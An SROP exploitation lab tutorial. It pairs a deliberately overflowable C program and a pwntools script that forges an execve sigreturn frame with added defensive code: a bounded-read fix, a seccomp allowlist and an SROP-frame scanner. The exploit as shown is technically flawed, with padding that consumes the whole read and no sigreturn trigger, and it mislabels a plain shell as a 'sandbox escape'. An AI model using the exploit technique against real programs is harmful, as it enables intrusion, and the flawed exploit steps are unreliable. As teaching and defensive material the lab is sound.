strangerRidingCaml
Sigreturn-Oriented Programming (SROP) Lab
In this lab, we will learn how to develop SROP exploits for sandbox escape.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a syscall instruction.
```c
#include <stdio.h>
#include <unistd.h>

int main() {
    char buf[10];
    read(0, buf, 100); // Vulnerable syscall: reads up to 100 bytes into a 10-byte stack buffer
    return 0;
}
```
Save the above code to a file named vulnerable.c and compile it with the following command:

```
$ gcc -o vulnerable vulnerable.c
```
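For contrast, here is a hardened version of the same program. This is an added example and not part of the original lab: the read is bounded to the buffer (the actual fix for the overflow), and a seccomp-bpf allowlist turns the process into the kind of sandbox the lab title refers to. The function names `bounded_read`, `install_syscall_allowlist` and `demo_bounded_read` are mine, and the allowlist contents are an assumption chosen for this one-read lab binary, not a general policy.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <stddef.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS SECCOMP_RET_KILL /* pre-4.14 kernel headers */
#endif
#endif

/* Fix for the overflow: never read more than the buffer can hold and keep the
 * result NUL-terminated. Returns the number of bytes read, or -1 on error. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Sandbox: a seccomp-bpf allowlist (assumed policy for this lab binary).
 * rt_sigreturn must stay allowed because ordinary signal delivery needs it,
 * which is exactly why SROP can still load a forged frame; the filter instead
 * caps what the forged registers can invoke: execve, or anything else not
 * listed, kills the process. x86-64 Linux only; returns 0 on success, -1 otherwise. */
int install_syscall_allowlist(void) {
#if defined(__linux__) && defined(__x86_64__)
    struct sock_filter filter[] = {
        /* Refuse frames that switch to a different syscall ABI. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* Allow only the syscalls this program legitimately needs. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_read, 4, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 3, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 2, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_rt_sigreturn, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof filter / sizeof filter[0]),
        .filter = filter,
    };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) return -1;
    return 0;
#else
    errno = ENOSYS;
    return -1;
#endif
}

/* Self-check with constructed input: 100 bytes of 'A' (the lab's read size)
 * pushed through a pipe into a 10-byte buffer guarded by a canary word.
 * Returns 1 if only 9 bytes land in the buffer and the guard is untouched. */
int demo_bounded_read(void) {
    struct { char buf[10]; uint32_t guard; } frame = { {0}, 0xCAFEBABEu };
    char input[100];
    int fds[2];
    if (pipe(fds) != 0) return 0;
    memset(input, 'A', sizeof input);
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input) return 0;
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);
    return n == 9 && frame.buf[9] == '\0' && frame.guard == 0xCAFEBABEu;
}

int main(void) {
    char buf[10];
    if (install_syscall_allowlist() != 0) {
        static const char msg[] = "seccomp allowlist not installed\n";
        write(2, msg, sizeof msg - 1); /* write(), not printf(): stdio may need extra syscalls */
    }
    ssize_t n = bounded_read(0, buf, sizeof buf);
    if (n > 0) write(1, buf, (size_t)n);
    return 0;
}
```

The two layers fix different things. The bounded read removes the overflow, so no frame ever reaches the stack. The allowlist is defense in depth: it cannot refuse rt_sigreturn, so it does not prevent a forged frame from being loaded, but a frame whose rax selects execve is killed before the shell is spawned. Measure what a real program needs (strace is the usual tool) before writing its allowlist; the one above is only enough for this lab binary.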
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to perform SROP for sandbox escape.
```python
from pwn import *

# The register names used below (rax, rdi, ...) are x86-64 registers,
# so tell pwntools which architecture the frame is for
context.arch = 'amd64'

# Specify the path to the vulnerable binary
binary_path = './vulnerable'

# Build the SROP frame
srop_frame = SigreturnFrame()
srop_frame.rax = 0x3b        # execve syscall number on x86-64 (0x0b is the i386 number)
srop_frame.rdi = 0xdeadbeef  # Placeholder: address of "/bin/sh"
srop_frame.rsi = 0x0
srop_frame.rdx = 0x0
srop_frame.rip = 0x4000000   # Placeholder: address of a syscall instruction

# Craft the payload
payload = b'A' * 100         # Padding up to the saved return address
payload += bytes(srop_frame)

# Launch the exploit
p = process(binary_path)
p.send(payload)
p.interactive()
```
Explanation of the Python script:
- We build a SigreturnFrame object to construct the SROP frame.
- The SROP frame sets the syscall number for execve, the arguments, and the address of the syscall instruction.
- We craft the payload with padding and the SROP frame.
- We launch the vulnerable binary and send the payload to perform the SROP exploit. p.interactive() allows us to interact with the spawned shell.
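To see concretely what a SigreturnFrame sets, the following added example (mine, not the lab author's code) decodes the x86-64 frame layout from the defender's side: given an input captured from a crash or a fuzzing run, it locates a plausible rt_sigreturn frame and reports the registers that frame would load. The offsets follow the kernel's struct ucontext/sigcontext layout for x86-64, which is also what pwntools' amd64 SigreturnFrame emits; the plausibility test (cs equal to the 64-bit user code selector 0x33 and rax in syscall range), the function names and the two constructed sample inputs, which reuse the lab script's placeholder values, are my assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Field offsets in the x86-64 rt_sigreturn frame: struct ucontext = uc_flags,
 * uc_link, uc_stack (24 bytes), then uc_mcontext = struct sigcontext. */
enum {
    SROP_FRAME_LEN = 248,
    OFF_RDI = 104, OFF_RSI = 112, OFF_RDX = 136, OFF_RAX = 144,
    OFF_RSP = 160, OFF_RIP = 168, OFF_CSGSFS = 184,
};
#define NR_EXECVE_AMD64 59u  /* execve on x86-64 Linux */
#define USER_CS_AMD64   0x33u /* 64-bit user code selector; without it the frame cannot return to user mode */

struct srop_regs { uint64_t rax, rdi, rsi, rdx, rsp, rip, csgsfs; };

/* The frame is little-endian regardless of the analysis host. */
static uint64_t get_u64le(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}
static void put_u64le(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Decode the registers a frame would load. Returns 0, or -1 if too short. */
int srop_frame_decode(const uint8_t *buf, size_t len, struct srop_regs *out) {
    if (len < SROP_FRAME_LEN) return -1;
    out->rax = get_u64le(buf + OFF_RAX);
    out->rdi = get_u64le(buf + OFF_RDI);
    out->rsi = get_u64le(buf + OFF_RSI);
    out->rdx = get_u64le(buf + OFF_RDX);
    out->rsp = get_u64le(buf + OFF_RSP);
    out->rip = get_u64le(buf + OFF_RIP);
    out->csgsfs = get_u64le(buf + OFF_CSGSFS);
    return 0;
}

/* Plausibility (assumed heuristic): cs must be the user code selector and rax
 * a valid syscall number, otherwise the restored state could not run. */
int srop_frame_plausible(const struct srop_regs *r) {
    return (r->csgsfs & 0xffff) == USER_CS_AMD64 && r->rax < 512;
}

/* The classic SROP-to-shell frame selects execve. */
int srop_frame_requests_execve(const struct srop_regs *r) {
    return r->rax == NR_EXECVE_AMD64;
}

/* Slide an 8-byte-aligned window over a captured input and return the offset
 * of the first plausible frame (registers in *out), or -1 if there is none. */
long scan_payload_for_srop(const uint8_t *payload, size_t len, struct srop_regs *out) {
    for (size_t off = 0; off + SROP_FRAME_LEN <= len; off += 8) {
        struct srop_regs r;
        if (srop_frame_decode(payload + off, len - off, &r) == 0 && srop_frame_plausible(&r)) {
            *out = r;
            return (long)off;
        }
    }
    return -1;
}

/* Constructed sample: 32 bytes of padding, then a frame selecting execve with
 * the lab script's placeholder addresses. Returns 1 if the scanner reports
 * offset 32 and decodes the expected registers. */
int demo_scan_finds_frame(void) {
    uint8_t payload[32 + SROP_FRAME_LEN];
    struct srop_regs r;
    memset(payload, 'A', sizeof payload);
    memset(payload + 32, 0, SROP_FRAME_LEN);
    put_u64le(payload + 32 + OFF_RAX, NR_EXECVE_AMD64);
    put_u64le(payload + 32 + OFF_RDI, 0xdeadbeef);
    put_u64le(payload + 32 + OFF_RIP, 0x4000000);
    put_u64le(payload + 32 + OFF_CSGSFS, USER_CS_AMD64);
    if (scan_payload_for_srop(payload, sizeof payload, &r) != 32) return 0;
    return srop_frame_requests_execve(&r) && r.rdi == 0xdeadbeef && r.rip == 0x4000000;
}

/* Constructed sample: padding only, which must not be flagged. */
int demo_scan_clean_input(void) {
    uint8_t payload[300];
    struct srop_regs r;
    memset(payload, 'A', sizeof payload);
    return scan_payload_for_srop(payload, sizeof payload, &r) == -1;
}
```

The point of the scan is triage: a crash input that contains a block with cs = 0x33 at offset 184 and a small rax at offset 144 is very unlikely to be ordinary data, and the decoded rip tells you which gadget in the binary the attacker was relying on, which is what you want to remove or guard in the fix. The cs check is deliberately strict; a frame that passed through a 32-bit compat path would use 0x23 and would need a second selector value.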
3. Exploiting the Vulnerability:
Execute the Python script to exploit the vulnerability:
```
$ python exploit.py
```
Once executed, you should have a shell prompt, confirming the successful sandbox escape using SROP.